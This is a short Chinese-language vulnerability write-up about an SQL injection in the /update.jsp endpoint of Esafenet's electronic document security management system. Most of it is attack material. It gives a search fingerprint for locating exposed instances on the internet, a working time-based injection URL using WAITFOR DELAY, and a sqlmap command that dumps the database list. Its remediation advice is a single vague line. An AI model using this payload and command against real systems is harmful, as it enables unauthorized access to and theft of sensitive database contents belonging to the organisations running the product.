漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。

影响产品

亿赛通电子文档安全管理系统

语法特征

app="亿赛通-电子文档安全管理系统"

漏洞复现

页面
亿赛通电子文档安全管理系统 Update.jsp SQL注入

亿赛通电子文档安全管理系统 Update.jsp SQL注入

POC

CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
亿赛通电子文档安全管理系统 Update.jsp SQL注入1

亿赛通电子文档安全管理系统 Update.jsp SQL注入1

亿赛通电子文档安全管理系统 Update.jsp SQL注入2
亿赛通电子文档安全管理系统 Update.jsp SQL注入2

python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

亿赛通电子文档安全管理系统 Update.jsp SQL注入3

亿赛通电子文档安全管理系统 Update.jsp SQL注入3

漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测